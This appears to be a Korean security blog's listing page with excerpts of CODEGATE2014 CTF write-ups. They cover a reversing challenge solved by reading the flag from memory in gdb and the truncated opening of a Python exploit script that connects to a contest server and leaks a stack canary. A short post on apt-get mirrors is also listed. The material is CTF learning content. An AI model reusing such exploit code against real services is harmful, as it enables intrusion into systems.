반응형 Security100 [풀이모음]CODEGATE2014 writeup http://sec.yka.me/ctf/writeup/2014/codegatequal 문제별로 풀이가 적힌 사이트가 잘 정리되어있습니ㅏㄷ. 2014. 2. 25. [Reversing] CODEGATE2014 dodoCrack writeup 풀었다고 하기엔 운이 좋았다고 생각해요...ㄷㄷ 일단 코드는 64bit 환경에서 만들어진 ELF파일이고 모든 심볼이 다 날라간 상태, IDA로 열어도 제대로 분석을 못합니다. 밑으로 내려가다 보면 다음과 같은 코드가 반복적으로 있어서 gdb로 좀 후반부 아무 곳이나 Break point를 잡고 rbp메모리를 보니까 flag가 박혀있네요...아마 프로그램 시작할때 어떤 연산을 하면서 rbp에 값을 입력한듯합니다. 그 루틴은 따로 찾지 못했는데..한번정도 찾아보는것도 재밌을거에요:D 2014. 2. 25. [exploit] CODEGATE2014 angry_doraemon writeup #!/usr/bin/env python import struct, socket, string def conn(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('58.229.183.18', 8888)) while True: st = s.recv(1000) if 'Give up\n>' in st: break s.send('4') s.recv(1024)#.encode('hex') return s def canary(s): s.send('y'*10 + ':') data = s.recv(1024) canary = data.split(':')[1][:3] print data.split(canary)[1].encode('hex') dummy =.. 2014. 2. 25. [apt-get] mirror site 설정 mirror site 목록미러사이트를 설정하면 apt-get을 이용하여 보다 많은 자료를 다운받을수 있습니다!! :D 2014. 2. 15. 이전 1 ··· 10 11 12 13 14 15 16 ··· 25 다음
